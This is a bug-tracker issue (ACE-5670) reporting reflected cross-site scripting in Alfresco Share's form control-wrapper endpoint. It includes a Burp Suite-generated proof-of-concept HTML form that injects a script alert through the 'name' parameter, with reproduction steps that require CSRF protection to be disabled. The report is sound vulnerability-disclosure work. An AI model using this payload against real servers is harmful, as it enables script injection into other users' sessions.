Uploaded image for project: 'Alfresco One Platform'
  1. Alfresco One Platform
  2. ACE-5670

Escaping is incorrect on /share/service/components/form/control-wrapper

    Details

      Description

      When security testing with the CSRF protection disabled Burp Suite Pro detects reflected XSS with the form /share/service/components/form/control-wrapper this indicates the escaping of reflected content on this page is incorrect.

      Burp Suite reports the displayMode JSON parameter, the name parameter, and the value parameters are susceptible to reflected XSS, the default CSRF proof of code for the name parameter is below. They all do look exploitable but I only demonstrated it on the "name" parameter.

      With CSRF protection enabled the issue is not obviously exploitable without another hack to obtain a CSRF token (when worse things can probably be done) hence the low security rating assigned.

      At this time I haven't looked for other methods of exploitation which might make this error more important.

      To reproduce, use a browser with no XSS auditor or auditor disabled.
      Disable CSRF protection in Alfresco.
      Adjust the code below for your Alfresco share server, open file and submit the form request.

      <html>
      <!-- CSRF PoC - generated by Burp Suite Professional -->
      <body>
      <form action="http://192.168.56.103:8080/share/service/components/form/control-wrapper" method="POST">
      <input type="hidden" name="htmlid" value="alf-id0" />
      <input type="hidden" name="type" value="association" />
      <input type="hidden" name="name" value="payloadnzmia"><script>alert(1)</script>rn78f" />
      <input type="hidden" name="label" value="Source Items" />
      <input type="hidden" name="value" value="" />
      <input type="hidden" name="controlParams" value="{"displayMode":"list","multipleSelectMode":true}" />
      <input type="hidden" name="field" value="{}" />
      <input type="submit" value="Submit request" />
      </form>
      </body>
      </html>

        Attachments

          Activity

            People

            • Assignee:
              closedissues Closed Issues
              Reporter:
              simonwaters Simon Waters
            • Votes:
              0 Vote for this issue
              Watchers:
              3 Start watching this issue

              Dates

              • Created:
                Updated:
                Resolved:

                Time Tracking

                Estimated:
                Original Estimate - Not Specified
                Not Specified
                Remaining:
                Remaining Estimate - 0 minutes
                0m
                Logged:
                Time Spent - 4 hours
                4h